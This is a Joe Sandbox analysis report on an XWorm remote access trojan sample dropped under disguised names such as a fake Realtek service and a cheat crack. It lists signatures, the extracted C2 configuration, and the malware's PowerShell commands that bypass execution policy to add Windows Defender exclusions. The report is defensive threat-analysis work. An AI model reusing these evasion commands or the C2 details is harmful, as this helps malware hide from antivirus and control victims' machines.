Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EsgeCzT4do.exe

Overview

General Information

Sample name:EsgeCzT4do.exe
renamed because original name is a hash value
Original sample name:3ac3efee88adab86a250a53dd9448453fcc4223662f5c6c21453606b6eb91b77.exe
Analysis ID:1561596
MD5:82a95b30418e5c4c3cba62b7805b09c9
SHA1:4921781362aae55b41c03f9aafd9e38e4555e5e3
SHA256:3ac3efee88adab86a250a53dd9448453fcc4223662f5c6c21453606b6eb91b77
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to log keystrokes (.Net Source)
Creates files with lurking names (e.g. Crack.exe)
Javascript uses Websockets
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • EsgeCzT4do.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\EsgeCzT4do.exe" MD5: 82A95B30418E5C4C3CBA62B7805B09C9)
    • Realtek HD Audio Universal Service.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" MD5: CE3E5F8613EA049B651549EBA3E3AA28)
      • powershell.exe (PID: 7340 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Realtek HD Audio Universal Service.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Windows Shell Experience Host.exe (PID: 1892 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe" MD5: 17F122079462E212871A1E2EB20EAFF9)
      • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Shell Experience Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Shell Experience Host.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SAM X CHEAT crack1.exe (PID: 6300 cmdline: "C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe" MD5: 38023663C5BBA5E8D46CEE0612E57A51)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 7056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://discord.gg/BNXa5rYFXM MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4292 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": ["147.185.221.20"], "Port": 65300, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xab0b:$s6: VirtualBox
      • 0xaa69:$s8: Win32_ComputerSystem
      • 0xbbf1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xbc8e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xbda3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xb663:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
        C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x820e:$s6: VirtualBox
              • 0x816c:$s8: Win32_ComputerSystem
              • 0x8ba2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8c3f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8d54:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x8850:$cnc4: POST / HTTP/1.1
              00000004.00000000.2045244894.000001DB14D2F000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 4 entries
                  SourceRuleDescriptionAuthorStrings
                  2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xab0b:$s6: VirtualBox
                      • 0xaa69:$s8: Win32_ComputerSystem
                      • 0xbbf1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xbc8e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xbda3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xb663:$cnc4: POST / HTTP/1.1
                      3.0.Windows Shell Experience Host.exe.ca0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        3.0.Windows Shell Experience Host.exe.ca0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          Click to see the 3 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, ParentProcessId: 528, ParentProcessName: Realtek HD Audio Universal Service.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', ProcessId: 7340, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, ParentProcessId: 528, ParentProcessName: Realtek HD Audio Universal Service.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', ProcessId: 7340, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, ParentProcessId: 528, ParentProcessName: Realtek HD Audio Universal Service.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', ProcessId: 7340, ProcessName: powershell.exe
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, ParentProcessId: 528, ParentProcessName: Realtek HD Audio Universal Service.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', ProcessId: 7340, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, ParentProcessId: 528, ParentProcessName: Realtek HD Audio Universal Service.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', ProcessId: 7340, ProcessName: powershell.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, ParentProcessId: 528, ParentProcessName: Realtek HD Audio Universal Service.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe', ProcessId: 7340, ProcessName: powershell.exe
                          No Suricata rule has matched

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: EsgeCzT4do.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeAvira: detection malicious, Label: TR/Spy.Gen
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeAvira: detection malicious, Label: TR/Spy.Gen
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackMalware Configuration Extractor: Xworm {"C2 url": ["147.185.221.20"], "Port": 65300, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeReversingLabs: Detection: 48%
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeReversingLabs: Detection: 91%
                          Source: EsgeCzT4do.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeJoe Sandbox ML: detected
                          Source: EsgeCzT4do.exeJoe Sandbox ML: detected
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: 147.185.221.20
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: 65300
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: <123456789>
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: <Xwormmm>
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: XWorm V5.6
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: USB.exe
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: %AppData%
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpackString decryptor: Windows Shell Experience Host.exe

                          Phishing

                          barindex
                          Source: https://discord.com/invite/BNXa5rYFXMHTTP Parser: !function(){if(null!=window.websocket){if(function(n){try{var o=localstorage.getitem(n);return null==o?null:json.parse(o)}catch(n){return null}}("token")&&!window.__overlay__){var n=null!=window.discordnative||null!=window.require?"etf":"json",o=window.global_env.gateway_endpoint+"/?encoding="+n+"&v="+window.global_env.api_version;null!=window.discordnative&&void 0!==window.uint8array&&void 0!==window.textdecoder?o+="&compress=zstd-stream":void 0!==window.uint8array&&(o+="&compress=zlib-stream"),console.log("[fast connect] "+o+", encoding: "+n+", version: "+window.global_env.api_version);var e=new websocket(o);e.binarytype="arraybuffer";var i=date.now(),w={open:!1,identify:!1,gateway:o,messages:[]};e.onopen=function(){console.log("[fast connect] connected in "+(date.now()-i)+"ms"),w.open=!0},e.onclose=e.onerror=function(){window._ws=null},e.onmessage=function(n){w.messages.push(n)},window._ws={ws:e,state:w}}}}()
                          Source: https://discord.com/invite/BNXa5rYFXMHTTP Parser: Base64 decoded: 108,222,66,182,126,74,65,185
                          Source: EsgeCzT4do.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49723 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49725 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49915 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50071 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50113 version: TLS 1.2
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_004054C6 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054C6
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C

                          Networking

                          barindex
                          Source: Malware configuration extractorURLs: 147.185.221.20
                          Source: Yara matchFile source: 2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPED
                          Source: global trafficTCP traffic: 192.168.2.5:50127 -> 147.185.221.23:58112
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                          Source: Joe Sandbox ViewIP Address: 162.159.130.234 162.159.130.234
                          Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
                          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.161.164
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
